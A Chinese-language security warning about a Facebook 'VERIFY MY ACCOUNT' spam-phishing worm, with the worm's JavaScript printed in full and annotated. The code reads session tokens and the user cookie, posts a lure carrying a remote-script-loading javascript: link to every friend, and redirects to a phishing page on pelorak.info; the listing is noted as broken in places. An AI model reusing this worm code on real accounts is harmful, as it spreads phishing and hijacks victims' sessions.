你或你朋友的 Facebook 上可能會發現不少“Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process…”的訊息。切勿相信!不要按下去,它絕對不是用來核實你的 FB 戶口資料,實情是個 SPAM + 釣魚程式。如果你曾經按下並完成登入,不要猶豫!立即重新設定密碼,你的密碼可能已被盜走!
Facebook 更改密碼頁:
https://www.facebook.com/editaccount.php?ref=mb&drop
其實這是一段 JavaScript 程式碼,用戶按下 “==VERIFY MY ACCOUNT==” 後,它就會以你的名義自動貼到你所有朋友的 Facebook 上,然後再彈出提示信息 “Verification Failed. Click ‘OK’ and follow the steps to prevent your account from being deleted.”。假若你 Click OK 就會去到一個 http://pelorak.info/verify.php?js 網頁,幸好這個網站暫時被鎖,未對用戶造成進一步傷害。如果你見到你的 Wall 有這些訊息,請立即刪除,不要按下任何連結,請各位按讚好或分享此新聞,以免朋友中伏,感謝。
以下是該 JavaScript 的 Code :
// Annotated sample of the wall-post spam script described in the article above.
// NOTE(review): the listing as published is not valid JavaScript. The quotes are
// typographic and the `for` header further down is truncated. It is kept verbatim
// here for analysis only.
// Observable indicators in this sample: the host pelorak.info (verify.js and
// verify.php), the lure text in `message`, and a wall-post action link whose href
// is a `javascript:` URI.

// Lure text; sent as the `user_message` field of every post made below.
var message = “Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process…”;
// A `javascript:` URI used as the href of the posted action link. When it runs it
// creates a <script> element whose src is verify.js on pelorak.info and appends it
// to <head>. The Math.random() suffix makes every URL unique (presumably a cache
// buster). The code that actually runs is whatever that host serves at the time,
// so it is not visible in this listing.
var jsText = “javascript:(function(){_ccscr=document.createElement(‘script’);_ccscr.type=’text/javascript’;_ccscr.src=’http://pelorak.info/verify.js?’+(Math.random());document.getElementsByTagName(‘head’)[0].appendChild(_ccscr);})();”;
// Visible label of the action link.
var myText = “==>[VERIFY MY ACCOUNT]<==”;
// Reads two form field values from the page the victim currently has open and
// replays them in the POST below. Presumably these are the session's request
// tokens; the script can read them because it runs inside the victim's own page.
var post_form_id = document.getElementsByName(‘post_form_id’)[0].value;
var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;
// The inner match extracts the digits after `c_user=` from the cookie string. The
// outer match searches the cookie for those digits again, so `uid` is a match
// array that is coerced to the digit string when concatenated below. The inner
// match returns null when there is no c_user cookie, and the [1] access then throws.
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
// `gf` is assigned without a declaration (implicit global). The third argument
// `false` makes this a synchronous GET to the typeahead endpoint, with `uid` as
// the viewer.
gf = new XMLHttpRequest();
gf.open(“GET”,”/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=” + uid + “&”+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
// Drops the first 9 characters of the response and eval()s the rest as an object
// literal. Presumably the 9 characters are an anti-hijacking prefix such as
// `for (;;);` (TODO confirm). `data` is another implicit global.
data = eval(‘(‘ + gf.responseText.substr(9) + ‘)’);
if(data.error){ }else{
// Target list: the payload entries, ordered by their `index` field.
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
// NOTE(review): the loop header on the next line is truncated in the published
// listing (the text after `i` was probably lost when the page's HTML was
// extracted). Judging by `friends[i].uid` below, the body is meant to run once per
// entry in `friends`.
for(var i=0; i var httpwp = new XMLHttpRequest();
var urlwp = “http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1”;
// Form body of the post. It replays the two values read above, sets the action
// link (href = jsText, text = myText), addresses one friend through to_ids[0], and
// appends the lure as user_message. The app_id and template_id values are
// hard-coded. `message` is appended without encodeURIComponent.
var paramswp = “&__d=1&app_id=6628568379&extern=0&” +
“&post_form_id=” + post_form_id +
“&fb_dtsg=” + fb_dtsg +
“&feed_info[action_links][0][href]=” + encodeURIComponent(jsText) +
“&feed_info[action_links][0][text]=” + encodeURIComponent(myText) +
“&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=” + friends[i].uid +
“&user_message=” + message;
// Asynchronous POST (third argument `true`).
httpwp.open(“POST”, urlwp, true);
httpwp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
// Content-length and Connection are forbidden request header names in the
// XMLHttpRequest specification, so conforming browsers do not let scripts set them.
httpwp.setRequestHeader(“Content-length”, paramswp.length);
httpwp.setRequestHeader(“Connection”, “keep-alive”);
// Empty handler: the response to the post is never inspected.
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
// After the posts are sent, the script shows a fake failure message and then
// navigates the current tab to verify.php on pelorak.info. The article above
// identifies that page as the phishing step.
alert(“Verification Failed. Click ‘OK’ and follow the steps to prevent your account from being deleted.”);
document.location = “http://pelorak.info/verify.php?js”;